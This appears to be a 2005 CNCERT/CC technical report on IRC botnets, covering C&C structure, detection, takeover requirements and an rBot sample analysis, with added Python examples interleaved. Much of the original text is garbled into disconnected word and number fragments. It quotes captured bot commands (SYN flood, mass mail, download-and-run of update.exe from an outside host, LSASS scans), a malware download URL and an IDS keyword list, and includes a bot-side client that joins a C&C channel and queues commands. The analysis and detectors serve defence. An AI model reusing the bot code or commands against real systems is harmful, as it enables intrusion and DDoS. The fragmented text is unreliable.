CNCERT/CC Technical Report CNCERTCC_TR_2005-001 (Draft)
Worm, DDoS, Spam, Phishing, Spyware
Botnet [1]
Bot
DDoS
DDoS
Bot: short for Robot; a program that runs on a compromised host and carries out the commands it receives.
Zombie: a host on which a Bot has been installed; in this report Zombie and Bot are used interchangeably for the controlled host.
IRC Bot: a Bot that connects to an IRC server, joins a channel and takes its commands from that channel.
Command & Control Server (C&C S): the IRC server the Bots connect to and through which the controller issues commands.
BotNet: the set of Bots that can be controlled through one C&C S.
Figure 1: structure of an IRC Bot network
Besides IRC Bots there are Bots controlled over AOL Instant Messenger, such as AIM-Canbot and Fizzer, and P2P Bots such as phatbot.
Bots go back to the early 1990s on Unix: Eggdrop (1993) was a benign IRC Bot used to manage channels.
Bot Bot Bot Bot Bot IRC Bot Bot Bot [email protected] MSN Bot
In November 1999 SubSeven 2.1 added IRC control, the first Windows backdoor that behaves as an IRC Bot; later Bots added Spam and DDoS functions.
Bots then acquired worm-style propagation: Deloader (2003) spread as a worm and installed a Bot on every host it broke into. Today's Bots combine the features of trojan horses and worms.
IP Bot IRC DCC Bot Spyware
Figure 2: relationship of the Bot to trojan horse, worm, spyware and virus
1 2001
[16]
Botnet
2004 3 19 Witty Witty 10 110 20 50 2 DDoS DDoS
DDoS
DDoS DDoS DDoS 3 IP CERT MessageLab [9][10] DDoS
4
5
6 socks
IRC IRC Bot
1. IRC: Internet Relay Chat (RFC 1459). Users connect to an IRC server and talk to each other in channels.
IRC IRC / IRC IRC
Example: user A (IP1) and user B (IP2) both connect to the IRC server irc.263.net and exchange messages through the server rather than directly. IRC servers normally listen on TCP 6667 (commonly anywhere in 6000-7000), but the servers IRC Bots use often listen on other ports, e.g. 443, 8000 or 500.
IRC
2. IRC Bot: technically an IRC Bot is just an IRC client (mIRC and HIRC are ordinary IRC clients); what makes it a Bot is that (1) it connects to the IRC server and joins a channel on its own and (2) it executes what it reads from the channel instead of showing it to a user.
The IRC Bot behaves exactly like an IRC client. GT bot, for example, is a set of mIRC scripts and runs inside the mIRC client itself; other IRC Bots implement the IRC protocol themselves. The commands an IRC Bot exchanges with the IRC server are:
1) NICK and USER: register the Bot's nickname and user name right after the TCP connection is opened.
2) PASS: the server password, sent immediately after the TCP connection and before NICK/USER when the IRC server requires one.
3) JOIN #Channel key: join the command channel; key is the channel key when the channel is key-protected.
4) MODE: set user or channel modes.
5) PING/PONG: the IRC server sends PING at regular intervals and the client must answer PONG or it is disconnected. PING/PONG keep-alives are the only traffic an idle IRC Bot produces, which is one of the features used to recognise IRC Bots.
6) PRIVMSG Channel :msg: the controller sends commands to the channel as ordinary messages; every Bot in the channel receives and executes them.
7) DCC SEND: direct client-to-client file transfer, used to push files to a Bot.
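The Bot side of this handshake, as an added example that is not from the report or from any Bot's source code: a minimal bot-side IRC client in Python that produces the lines listed above (PASS, NICK/USER, JOIN with key, PONG for PING) and queues the commands it would execute from the channel TOPIC (numeric 332) and from channel PRIVMSGs. The welcome numeric 001 and the server name are standard IRC; nick, channel and key values are the ones in the capture later in this report.

```python
import re

# One IRC line: [:prefix] COMMAND [params ...] [:trailing]   (RFC 1459 framing)
_IRC_LINE = re.compile(r'^(?::(?P<prefix>\S+) )?(?P<command>\S+)(?: (?P<rest>.*))?$')


def parse_irc(line):
    """Split an IRC line into (prefix, COMMAND, [params...]); trailing text is the last param."""
    line = line.rstrip("\r\n")
    m = _IRC_LINE.match(line)
    if not m:
        raise ValueError("not an IRC line: %r" % line)
    rest = m.group("rest") or ""
    if rest.startswith(":"):                  # only a trailing parameter
        params = [rest[1:]]
    elif " :" in rest:                        # middle params, then trailing
        middle, trailing = rest.split(" :", 1)
        params = middle.split() + [trailing]
    else:
        params = rest.split()
    return m.group("prefix"), m.group("command").upper(), params


class IrcBot:
    """Bot side of the exchange: register, join the C&C channel, keep alive,
    and queue whatever arrives as a '.'-command in the TOPIC or in a PRIVMSG."""

    def __init__(self, nick, user, channel, key=None, server_pass=None):
        self.nick, self.user = nick, user
        self.channel, self.key = channel, key
        self.server_pass = server_pass
        self.commands = []        # commands the bot would run, in order

    def connect(self):
        """Lines sent right after the TCP connection: PASS (if any), then NICK/USER."""
        out = ["PASS %s" % self.server_pass] if self.server_pass else []
        out += ["NICK %s" % self.nick,
                "USER %s 0 0 :%s" % (self.user, self.nick)]
        return out

    def handle(self, line):
        """Process one line from the server; return the lines the bot sends back."""
        prefix, cmd, params = parse_irc(line)
        if cmd == "PING":                              # keep-alive: answer or be dropped
            return ["PONG :%s" % params[-1]]
        if cmd == "001":                               # RPL_WELCOME: registration done
            join = "JOIN %s" % self.channel
            return [join + " " + self.key if self.key else join]
        if cmd == "332" and params[-1].startswith("."):      # RPL_TOPIC: standing command
            self.commands.append(params[-1])
        elif cmd == "PRIVMSG" and params[0] == self.channel and params[-1].startswith("."):
            self.commands.append(params[-1])           # command typed into the channel
        return []


if __name__ == "__main__":
    # Constructed session; nick, channel and key come from the capture in the report.
    bot = IrcBot("CHN|9148119", "autdeoxsnv", "#xdcc", key="dropit")
    for sent in bot.connect():
        print("->", sent)
    for received in (":irc.example 001 CHN|9148119 :Welcome",
                     ":irc.example 332 CHN|9148119 #xdcc :.advscan asn1smb 100 5 0 b",
                     "PING :irc.example",
                     ":ControllerNICK!ControllerUSER@10.10.10.10 PRIVMSG #xdcc :.login password -s"):
        print("<-", received)
        for sent in bot.handle(received):
            print("->", sent)
    print("queued commands:", bot.commands)
```

The "->"/"<-" markers in the output follow the notation used for the captures in this report: a line sent to the C&C server and a line received from it.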
P2P
IRC DCC 1987
2004 CNCERT/CC
1. DDoS
The following command was captured in a Bot channel:
->PRIVMSG #rbot :.syn www.xxx.com 80 200 3600\n
Sent to channel #rbot, .syn starts a SYN flood against www.xxx.com port 80 with the parameters 200 and 3600, the latter being the duration in seconds. Notation used in this report: "->" marks a line sent to the C&C S (by a Bot or by the controller), "<-" a line received from the C&C S.
2. Phishing
Bots are also used for phishing: by tampering with the victim's DNS settings or hosts file (pharming), and by acting as redirectors in front of the phishing server so that the server's own ISP never sees the victims' traffic
[6]
Phishing
3. Spam
Spammers use Bots both to send spam and to get around blacklists. Example 1: mass mailing driven from the channel:
->PRIVMSG #rbot :.mm http://www.recpt.com/fetch.php http://www.mail.net/email.html
.mm means mass mail: fetch.php on www.recpt.com returns the recipient list and email.html on www.mail.net is the message body; every Bot then sends the mail itself, so the spam comes from the Bot's IP rather than the spammer's.
Example 2: the Bot runs a socks v4/v5 proxy or an open mail relay. Spammers have always used open proxies and open mail relays to hide their own address; a Bot offering a proxy or open relay gives the spammer the same cover on a host that is not yet on any blacklist.
Through a socks v4 proxy the spammer still talks SMTP to the target mail server himself, via the Bot; with an open relay the Bot delivers the mail. In both cases the receiving mail server only sees the Bot's IP, and the complaint goes to the Bot owner's ISP.
Example 3: harvesting email addresses from the infected host, e.g. AgoBot's harvest.emails command.
4. Spyware
Bots collect information from the host, e.g. with a keylogger, and can be told to fetch and run new components:
->PRIVMSG #rBot :Download http://www.elitecoders.net/update.exe c:\rBot.exe 1
This tells the Bot to download update.exe from www.elitecoders.net, save it as c:\rBot.exe and, with the trailing 1, run it after the download.
On a Windows host the Bot shows itself in the network: it keeps one long-lived TCP connection to the IRC server (CNCERT/CC mostly sees TCP 6667) on which only PING/PONG keep-alives pass while the Bot is idle, and when it scans it opens many connections to ports 135 and 445 on other hosts. Run netstat -an from cmd.exe to list the connections, and fport.exe to map each local port to the process that owns it.
Bots also steal software CD-Keys from the host.
Newer Bots use rootkit techniques [2] to hide their files, processes and connections, so the checks above may come back clean on a host with a rootkit-equipped Bot.
CNCERT/CC
CNCERT/CC finds Bots and Botnets in three ways: 1) honeypots that capture Bot samples, 2) IDS signatures on the network, 3) analysis of the IRC traffic itself.
(1) Honeypot: a honeypot on the Internet is infected by the Bot like any other host; the Honeywall in front of it records the Bot's DNS lookups and IP connections, its scanning and the files it downloads. Running the captured sample on a Windows honeypot [11] yields the C&C server, channel and key the Bot uses, the approach the Honeynet Project describes in [3]. The Honeynet Project tracked Botnets from November 2004 to March 2005 with one HoneyWall and mwcollect [8] as sample collector, following about 180 Botnets; between November 2004 and January 2005 it observed 406 DDoS attacks against 179 targets [4].
(2) IDS: signatures for IRC Bot traffic key on the IRC commands JOIN, PASS, PRIVMSG, NICK, TOPIC and NOTICE, especially on ports other than the usual IRC ports, and on payload keywords typical of Bot commands: tcp, udp, syn, ddos, http://, download, .exe, update, scan, exploit, login, logon, advscan, lsass, dcom, beagle, dameware. Beyond string matching, three behavioural features separate Bots from human IRC users:
1) fast joining bots: many clients JOIN the same channel within a short time, as freshly infected hosts report in;
2) long standing connection: a Bot stays connected for hours or days;
3) not talkative: apart from its replies to commands, a Bot sends nothing but PING/PONG keep-alives.
These features come from the DDoSVax project [5]. The IDS approach has limits:
1) the IDS detects individual Bots on the network it monitors; it does not show the Botnet as a whole or its controller;
2) if the IRC Bot uses a modified protocol that does not follow the IRC RFC, the signatures do not match;
3) the controller can hide behind a socks v4 server: a) the controller sends TOPIC #rBot :.advscan lsass 200 5 0 -r s\n to the socks server; b) the socks server forwards the same TOPIC #rBot :.advscan lsass 200 5 0 -r s\n to the IRC server; c) every Bot in the Botnet receives <-:ControllerNICK!ControllerUSER@socks(HOST or IP) TOPIC #rBot :.advscan lsass 200 5 0 -r s\r\n. Neither the IDS nor the Bots see the controller's real IP, only the socks server's.
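The keyword signatures and the three behavioural features above, as an added example in Python (not the report's or DDoSVax's code), run over a constructed IRC session log. Each log entry is (time in seconds, client IP, direction in the "->"/"<-" notation of this report, raw line). The thresholds (join window, host count, minimum connection time) are assumptions to be tuned on real traffic.

```python
import re
from collections import defaultdict

# IRC commands and payload keywords the report lists for the IDS rules.
IRC_COMMANDS = {"JOIN", "PASS", "PRIVMSG", "NICK", "TOPIC", "NOTICE"}
BOT_KEYWORDS = ("advscan", "lsass", "dcom", "beagle", "dameware", "ddos", "exploit",
                "download", "update", "logon", "login", "http://", ".exe", "scan",
                "syn", "tcp", "udp")
# What an idle bot sends anyway; anything else from the client counts as talking.
KEEPALIVE = {"PING", "PONG", "NICK", "USER", "PASS", "JOIN", "MODE"}

_CMD = re.compile(r"^(?::\S+ )?(\S+)(?: (\S+))?")


def irc_command(line):
    """(COMMAND, first parameter) of a raw IRC line, prefix ignored."""
    m = _CMD.match(line.strip())
    return (m.group(1).upper(), m.group(2)) if m else (None, None)


def signature_hits(log):
    """Lines a keyword rule fires on: an IRC command plus a bot keyword in the payload."""
    hits = []
    for t, host, direction, line in sorted(log):
        cmd, _ = irc_command(line)
        if cmd in IRC_COMMANDS:
            low = line.lower()
            kw = next((k for k in BOT_KEYWORDS if k in low), None)
            if kw:
                hits.append((host, cmd, kw))
    return hits


def fast_joining(log, window=10, min_hosts=3):
    """Channels that `min_hosts` distinct clients JOIN within `window` seconds."""
    joins = defaultdict(list)
    for t, host, direction, line in log:
        cmd, chan = irc_command(line)
        if direction == "->" and cmd == "JOIN" and chan:
            joins[chan].append((t, host))
    flagged = {}
    for chan, events in joins.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            hosts = {h for t, h in events[i:] if t - t0 <= window}
            if len(hosts) >= min_hosts:
                flagged[chan] = len(hosts)
                break
    return flagged


def quiet_long_connections(log, min_duration=1800):
    """Clients connected at least `min_duration` s that only ever sent keep-alives."""
    first, last, talk = {}, {}, defaultdict(int)
    for t, host, direction, line in sorted(log):
        first.setdefault(host, t)
        last[host] = t
        if direction == "->" and irc_command(line)[0] not in KEEPALIVE:
            talk[host] += 1
    return sorted(h for h in first if last[h] - first[h] >= min_duration and not talk[h])


# Constructed log: four bots join #xdcc within seconds and then only answer PINGs;
# 10.0.0.9 is a person who joins #linux and talks.
LOG = [
    (0,    "10.0.0.1", "->", "NICK CHN|9148119"),
    (0,    "10.0.0.1", "->", "USER autdeoxsnv 0 0 :CHN|9148119"),
    (1,    "10.0.0.1", "->", "JOIN #xdcc dropit"),
    (1,    "10.0.0.1", "<-", ":irc.example 332 CHN|9148119 #xdcc :.advscan asn1smb 100 5 0 b"),
    (2,    "10.0.0.2", "->", "JOIN #xdcc dropit"),
    (3,    "10.0.0.3", "->", "JOIN #xdcc dropit"),
    (4,    "10.0.0.4", "->", "JOIN #xdcc dropit"),
    (5,    "10.0.0.9", "->", "JOIN #linux"),
    (50,   "10.0.0.1", "<-", ":ctrl!u@socks.example.net TOPIC #xdcc :.advscan lsass 200 5 0 -r s"),
    (600,  "10.0.0.1", "<-", "PING :irc.example"),
    (600,  "10.0.0.1", "->", "PONG :irc.example"),
    (900,  "10.0.0.9", "->", "PRIVMSG #linux :anyone awake?"),
    (3600, "10.0.0.1", "->", "PONG :irc.example"),
    (3700, "10.0.0.9", "->", "PONG :irc.example"),
]

if __name__ == "__main__":
    print("signature hits:", signature_hits(LOG))
    print("fast joining:", fast_joining(LOG))
    print("quiet long connections:", quiet_long_connections(LOG))
```

Note that the TOPIC from the socks host is caught by the keyword rule but attributes the command to socks.example.net, which is exactly limit 3) above: the rule identifies the Bot and the relay, not the controller.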
To analyse or take over an IRC Botnet one needs: 1. the IRC server's IP and port (from the Bot's connection); 2. the channel name and channel key (from the JOIN); 3. the host mask and the .login password the Bot requires before it accepts commands (from the Bot binary or its traffic);
4. the Bot's command set once logged in, e.g. .update, .download, .uninstall.
Botnet
1.
bot 1 bot
bot bot 2 bot bot bot bot
2.
IP
bot
3. bot
2005 CNCERT/CC
Bot
1. Several IRC servers: the Bot carries a list of servers Serv1, Serv2, ..., ServN. If Serv1 is taken down or its IP is blocked, the Bots move on to Serv2, Serv3 and so on, so shutting down one server does not dissolve the Botnet. The Bot also encodes the server it registered on in its nick (Nick_Serv1 for Bots on Serv1, and so on): when Bots named Nick_Serv3 and Nick_Serv6 turn up on ServX, the controller knows that Serv3 and Serv6 have become unreachable.
2. Commands in the channel TOPIC: the IRC server sends the channel topic to every client that joins, so a command placed in the TOPIC is executed by every Bot as it joins, without the controller being online and without a PRIVMSG to each Bot. Examples seen in TOPICs:
1) .advscan lsass 200 5 0 -r s: scan for hosts vulnerable to the LSASS flaw with 200 threads, a 5 second delay and 0 minutes of duration (no time limit), -r = random target addresses, -s = silent (no report to the channel).
2) .http.update http:/server/rBot.exe c:\rBot.exe 1: download rBot.exe from server, save it as c:\rBot.exe and (1) run it, which updates the Bot to a new version.
CNCERT/CC has also seen TOPICs that move the Bots to a new channel (JOIN #newchannel), after which the old channel looks empty to anyone watching it. Because the TOPIC is a standing command, a Botnet can be kept busy even when the controller never sends a PRIVMSG to the Bots.
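The grammar of the two TOPIC commands, as an added example in Python (rBot parses these strings in C; this is not its code): a parser for the ".command positional... flags" form, with the positional fields for .advscan and .http.update/.download taken from the explanation above. Both flag spellings ("-r" and the bare "s" exactly as the TOPIC was captured) are accepted, unknown trailing tokens are kept aside, and a missing argument is an error rather than a silent default. Reading 0 minutes as "no time limit" follows the report; the field names are this example's own.

```python
# Positional fields and flag names for the rBot commands discussed in the text.
# Field names are this example's own; the order follows the captured commands.
COMMANDS = {
    "advscan":     (["exploit", "threads", "delay", "minutes"], {"r": "random", "s": "silent"}),
    "http.update": (["url", "path", "run"], {}),
    "download":    (["url", "path", "run"], {}),
}


def _convert(field, value):
    """Numeric fields become ints; the download/update run flag becomes a bool."""
    if field in ("threads", "delay", "minutes"):
        return int(value)
    if field == "run":
        return value == "1"
    return value


def parse_bot_command(text):
    """Parse '.cmd arg ... [flags]' as found in a TOPIC or PRIVMSG.
    Returns None when the text is not a '.'-command, raises ValueError when a
    positional argument is missing, and returns unknown commands unparsed."""
    text = text.strip()
    if not text.startswith(".") or len(text) < 2:
        return None
    name, *args = text[1:].split()
    spec = COMMANDS.get(name.lower())
    if spec is None:
        return {"command": name.lower(), "known": False, "args": args, "flags": {}}
    fields, flag_names = spec
    if len(args) < len(fields):
        raise ValueError("%s needs %d arguments, got %d" % (name, len(fields), len(args)))
    values = {f: _convert(f, v) for f, v in zip(fields, args)}
    flags, extra = {}, []
    for tok in args[len(fields):]:
        key = tok.lstrip("-").lower()
        if key in flag_names:
            flags[flag_names[key]] = True        # '-r' and bare 'r' both count
        else:
            extra.append(tok)                     # e.g. the 'b' seen in the sample capture
    return {"command": name.lower(), "known": True, "args": values,
            "flags": flags, "extra": extra}


def describe(cmd):
    """Render the same reading the report gives for the command."""
    a = cmd["args"]
    if cmd["command"] == "advscan":
        limit = "no time limit" if a["minutes"] == 0 else "%d min" % a["minutes"]
        opts = ", ".join(sorted(cmd["flags"])) or "no options"
        return "scan for %s with %d threads, %d s delay, %s, %s" % (
            a["exploit"], a["threads"], a["delay"], limit, opts)
    if cmd["command"] in ("http.update", "download"):
        return "fetch %s, save as %s%s" % (a["url"], a["path"],
                                          " and run it" if a["run"] else "")
    return "unknown command %s %s" % (cmd["command"], " ".join(a))


if __name__ == "__main__":
    for topic in (".advscan lsass 200 5 0 -r s",
                  ".http.update http:/server/rBot.exe c:\\rBot.exe 1",
                  ".advscan asn1smb 100 5 0 b"):
        print(topic, "=>", describe(parse_bot_command(topic)))
```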
3. Controller authentication: a Bot only executes commands from a controller who has logged in (.login, !logon, !auth and similar, depending on the Bot family), and checks the controller's nick, user and host against built-in masks. Example from rBot v0.6.5:
(1) The controller sends:
->PRIVMSG #rbot :.login password -s\n
(2) Each Bot in the channel receives it with the controller's prefix, where host is the controller's IP or host name as seen by the IRC server:
<-:ControllerNICK!ControllerUSER@host PRIVMSG #rbot :.login password -s\r\n
For a controller at 10.10.10.10 the Bot sees:
<-:ControllerNICK!ControllerUSER@10.10.10.10 PRIVMSG #rbot :.login password -s\r\n
(3) rBot checks three things before accepting the .login: the NICK (ControllerNICK) and USER (ControllerUSER) of the sender, the host part against its host masks, and the command with its password (.login password -s). rBot's masks use wildcards (*), e.g. *@*.net and "*@*.com", so any user at a .net or .com host matches; a controller whose host does not match the masks, for example a bare IP address, is refused even with the right password.
(4) -s means silent: the Bot does not acknowledge the login. Without -s the Bot answers:
->PRIVMSG #rbot :password accepted\n
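The .login check described above, as an added example in Python (rBot is written in C; this is not its code): the Bot matches the sender's user@host against wildcard masks with fnmatch, checks the password, and only then remembers the sender as a master; -s suppresses the "password accepted" reply. It also shows why the socks trick in the IDS section works: the Bot sees the socks server's host, so a socks host under .net or .com passes the mask while the controller's bare IP would be refused. The mask list, the password and the channel name are assumed values.

```python
from fnmatch import fnmatchcase


def split_prefix(prefix):
    """'nick!user@host' -> (nick, user, host)."""
    nick, _, rest = prefix.partition("!")
    user, _, host = rest.partition("@")
    return nick, user, host


class BotAuth:
    """rBot-style login gate: the sender's user@host must match one of the
    built-in masks (fnmatch wildcards, as in '*@*.net') and the password must
    match before the sender is remembered as a master."""

    def __init__(self, password, host_masks, channel="#rbot"):
        self.password = password
        self.host_masks = host_masks
        self.channel = channel
        self.masters = set()

    def login(self, prefix, text):
        """Handle '.login <password> [-s]' from prefix.
        Returns (status, reply_line): reply_line is the PRIVMSG the bot would
        send, or None when the login is refused or -s (silent) was given."""
        parts = text.split()
        if len(parts) < 2 or parts[0] != ".login":
            return ("ignored", None)
        _, user, host = split_prefix(prefix)
        if not any(fnmatchcase(user + "@" + host, m) for m in self.host_masks):
            return ("refused: host mask", None)      # a bare IP never matches *.net / *.com
        if parts[1] != self.password:
            return ("refused: password", None)
        self.masters.add(prefix)
        silent = "-s" in parts[2:]
        return ("accepted", None if silent else "PRIVMSG %s :password accepted" % self.channel)

    def authorised(self, prefix):
        """Whether a later command from prefix would be executed."""
        return prefix in self.masters


if __name__ == "__main__":
    # Assumed masks and password; prefixes follow the report's examples.
    auth = BotAuth("password", ["*@*.net", "*@*.com"])
    for who, text in (("ControllerNICK!ControllerUSER@10.10.10.10", ".login password -s"),
                      ("ControllerNICK!ControllerUSER@socks.example.net", ".login password"),
                      ("x!y@socks.example.net", ".login wrong"),
                      ("ControllerNICK!ControllerUSER@relay.example.com", ".login password -s")):
        print(who, "=>", auth.login(who, text))
```

Because the match is on the prefix the IRC server reports, anything that rewrites the source of the connection (a socks server, a shell box) satisfies the mask on the controller's behalf; the mask protects the Botnet from strangers in the channel, not from anyone who has the password and a host in the right domain.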
bot Windows Windows bot 90 [7]
Windows XP
11 Bot
Symantec reports that the number of Bot-infected hosts seen per day rose from under 2,000 to more than 30,000 during the first half of 2004 [15]; MessageLabs attributes about 70% of the spam seen in 2004 to Bots [10]; CipherTrust's Bot statistics for April and May 2005 [12] give further figures (15, 17 and 20%-15% in the original).
Bots are moving from IRC to P2P control: Agobot/PhatBot already carry P2P code alongside IRC, and a P2P Botnet has no central server that can be taken down.
Since 2005 Bots (rBot variants among them) ship with rootkit components that hide the Bot's files and processes from the tools used to find them.
2004 CNCERT/CC Bot IRC
P2P Bots: Phatbot [13] and sinit [14] are two examples. Phatbot first finds peers through Gnutella cache servers: it registers itself as a Gnutella peer on TCP 4387 and obtains other peers' addresses from the cache servers; it then uses the WASTE protocol for its own traffic, in which md5 is used. sinit is a P2P trojan whose peers exchange dll files among themselves, so new functions reach the Bots as dlls distributed from peer to peer.
bot
CNCERT/CC bot
On 9 July 2005 CNCERT/CC obtained an rBot sample from http://goa-irc.co.uk/wosten/rbot.exe and ran it on a test host with IP 10.0.0.1, with a sniffer on the segment. netstat -an in cmd.exe then showed (comments on the right):
C:\>netstat -an
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 10.0.0.1:1150 203.151.217.85:6667 ESTABLISHED    (the IRC connection: C&C S 203.151.217.85, port 6667)
TCP 10.0.0.1:1616 202.108.32.137:445 FIN_WAIT_1      (from here on, connection attempts to port 445 on one 202.108.x.x host after another: the Bot is scanning)
TCP 10.0.0.1:1631 202.108.32.147:445 FIN_WAIT_1
TCP 10.0.0.1:1714 202.108.32.190:445 FIN_WAIT_1
TCP 10.0.0.1:1727 202.108.32.165:445 FIN_WAIT_1
TCP 10.0.0.1:2253 202.108.34.211:445 TIME_WAIT
TCP 10.0.0.1:2904 202.108.37.91:445 TIME_WAIT
TCP 10.0.0.1:3476 202.108.39.151:445 TIME_WAIT
TCP 10.0.0.1:3478 202.108.39.153:445 TIME_WAIT
TCP 10.0.0.1:3480 202.108.39.155:445 TIME_WAIT
TCP 10.0.0.1:3486 202.108.39.151:445 TIME_WAIT
TCP 10.0.0.1:3487 202.108.39.153:445 TIME_WAIT
TCP 10.0.0.1:3488 202.108.39.155:445 TIME_WAIT
TCP 10.0.0.1:3673 202.108.40.82:445 TIME_WAIT
TCP 10.0.0.1:3674 202.108.40.82:445 TIME_WAIT
TCP 10.0.0.1:4953 202.108.45.20:445 TIME_WAIT
TCP 10.0.0.1:4955 202.108.45.20:445 TIME_WAIT
TCP 10.0.0.1:4959 202.108.45.23:445 TIME_WAIT
TCP 10.0.0.1:4961 202.108.45.23:445 TIME_WAIT
UDP 0.0.0.0:69 *:*                                    (a listener on UDP 69, tftp, opened by the Bot)
UDP 0.0.0.0:445 *:*
UDP 10.0.0.1:137 *:*
UDP 10.0.0.1:138 *:*
fport.exe then maps the two suspicious ports to a process:
C:\>fport | find "1150"
1048 wininit -> 1150 TCP C:\WINNT\system32\wininit.exe
C:\>fport | find "69"
1048 wininit -> 69 UDP C:\WINNT\system32\wininit.exe
Both the IRC connection on port 6667 and the tftp listener on UDP 69 belong to wininit.exe (PID 1048), which is the rBot running under a system-looking name. Sysinternals FileMon shows the files the Bot touches, and Sysinternals autoruns shows how it survives a reboot: the rBot adds itself under
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Update 32 "wininit.exe"
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Microsoft Update 32 "wininit.exe"
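The netstat/fport triage above, as an added example in Python (not a CNCERT/CC tool): it parses the two listings (a constructed, shortened copy of the netstat output above with the same addresses, and the two fport lines), attributes local ports to processes through the fport output, and flags the three things the analysis points at: an established connection to an IRC port, a fan-out of connections from one host to the same remote port (the 445 scan), and listeners owned by the same process. The fan-out threshold and the IRC port range are assumptions; in practice fport is run without a filter so that every port gets an owner.

```python
from collections import defaultdict

# Constructed from the report's listing: same addresses, fewer 445 lines.
NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    10.0.0.1:1150          203.151.217.85:6667    ESTABLISHED
  TCP    10.0.0.1:1616          202.108.32.137:445     FIN_WAIT_1
  TCP    10.0.0.1:1631          202.108.32.147:445     FIN_WAIT_1
  TCP    10.0.0.1:1714          202.108.32.190:445     FIN_WAIT_1
  TCP    10.0.0.1:1727          202.108.32.165:445     FIN_WAIT_1
  TCP    10.0.0.1:2253          202.108.34.211:445     TIME_WAIT
  TCP    10.0.0.1:2904          202.108.37.91:445      TIME_WAIT
  UDP    0.0.0.0:69             *:*
  UDP    0.0.0.0:445            *:*
  UDP    10.0.0.1:137           *:*
"""

# fport output for the two ports the report looked up (constructed copy).
FPORT = """\
Pid   Process            Port  Proto Path
1048  wininit        ->  1150  TCP   C:\\WINNT\\system32\\wininit.exe
1048  wininit        ->  69    UDP   C:\\WINNT\\system32\\wininit.exe
"""


def parse_netstat(text):
    """netstat -an lines -> dicts; UDP lines carry no remote port and no state."""
    conns = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 3 or f[0] not in ("TCP", "UDP"):
            continue
        lip, lport = f[1].rsplit(":", 1)
        rip, rport = f[2].rsplit(":", 1)
        conns.append({"proto": f[0], "lip": lip, "lport": int(lport), "rip": rip,
                      "rport": int(rport) if rport.isdigit() else None,
                      "state": f[3] if len(f) > 3 else ""})
    return conns


def parse_fport(text):
    """fport lines -> {(proto, local port): (pid, process, path)}."""
    owners = {}
    for line in text.splitlines():
        f = line.split()
        if len(f) >= 6 and f[0].isdigit() and f[2] == "->":
            owners[(f[4], int(f[3]))] = (int(f[0]), f[1], f[5])
    return owners


def triage(conns, owners, fanout=5, irc_ports=range(6000, 7001)):
    """Flag IRC-like established sessions, scan fan-out and listeners, each with its owner."""
    remote_ips = defaultdict(set)
    irc_like, listeners = [], []
    for c in conns:
        proc = owners.get((c["proto"], c["lport"]), (None, "?", "?"))[1]
        if c["proto"] == "TCP" and c["state"] not in ("LISTENING", ""):
            remote_ips[c["rport"]].add(c["rip"])          # distinct targets per remote port
        if c["state"] == "ESTABLISHED" and c["rport"] in irc_ports:
            irc_like.append((c["lip"], c["lport"], c["rip"], c["rport"], proc))
        if c["state"] == "LISTENING" or (c["proto"] == "UDP" and c["rip"] == "*"):
            listeners.append((c["proto"], c["lport"], proc))
    scans = {p: len(ips) for p, ips in remote_ips.items() if len(ips) >= fanout}
    return {"irc_like": irc_like, "scan_ports": scans, "listeners": listeners}


if __name__ == "__main__":
    report = triage(parse_netstat(NETSTAT), parse_fport(FPORT))
    for key, value in report.items():
        print(key, value)
```

On the report's host this yields one IRC-like session (port 1150 to 203.151.217.85:6667, owned by wininit), a fan-out on remote port 445, and the UDP 69 listener attributed to the same wininit process, which is the chain of evidence the text builds by hand.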
So wininit.exe is the process that scans port 445 and holds the IRC connection on port 6667.
The sniffer shows wininit.exe's IRC session (-> sent by the Bot, <- received from the server):
->NICK CHN|9148119\r\nUSER autdeoxsnv 0 0 :CHN|9148119\r\n
   (registration: nick CHN|9148119, user name autdeoxsnv)
->JOIN #xdcc dropit\r\n
   (join the channel #xdcc; the channel key is dropit)
<-:CHN|9148119!autdeoxsnv@10.0.0.1 332 CHN|9148119 #xdcc :.advscan asn1smb 100 5 0 b
   (numeric 332, the channel TOPIC: the standing command is an advscan for the ASN.1 vulnerability over SMB (asn1smb), which the Bot executes as soon as it has joined)
->PRIVMSG #xdcc :[SCAN]: Sequential Port Scan Started On 10.0.0.0:445 within a delay of 5 seconds for 0 min using 100 threads\r\n
   (the Bot reports to the channel that it has started a sequential scan of port 445 from 10.0.0.0 with 100 threads, a 5 second delay and no time limit)
CNCERT/CC 2005
[1] (Chinese-language reference; title and authors not recoverable), 2005.4
[2] Paul F. Roberts, Malicious Bots Hide Using Rootkit Code, eWeek, May 17, 2005, http://www.eweek.com/article2/0,1759,1816972,00.asp
[3] The Honeynet Project, Know your Enemy: Tracking Botnets
[4] Felix C. Freiling, Thorsten Holz and Georg Wicherski, Botnet Tracking: Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks, http://www.honeynet.org/papers/individual/
[5] Jonas Bolliger and Thomas Kaufmann, Detecting Bots in Internet Relay Chat Systems, www.tik.ee.ethz.ch/~ddosvax/sada/sa-2004-29.task.pdf
[6] The Honeynet Project, Know your Enemy: Phishing, http://www.honeynet.org, 16th May 2005
[7] Helen J. Wang, Chuanxiong Guo, Daniel R. Simon and Alf Zugenmaier (Microsoft Research), Shield: First-Line Worm Defense, ACM SIGCOMM 2004
[8] http://www.mwcollect.org
[9] http://www.cert.org
[10] http://www.messagelab.co.uk
[11] Joe Stewart, Emerging Threats: From Discovery to Protection, www.sdissa.org/downloads/emergingthreats-public.pdf
[12] http://www.ciphertrust.com/resources/statistics/zombie.php
[13] Lurhq Threat Intelligence Group, Phatbot Trojan Analysis, http://www.lurhq.com/phatbot.html
[14] Lurhq Threat Intelligence Group, Sinit P2P Trojan Analysis, http://www.lurhq.com/sinit.html
[15] http://www.symantec.com/press/index_2004.html
[16] Tom Vogt, Simulating and optimising worm propagation algorithms, www.securityfocus.com/guest/24046, 2003.9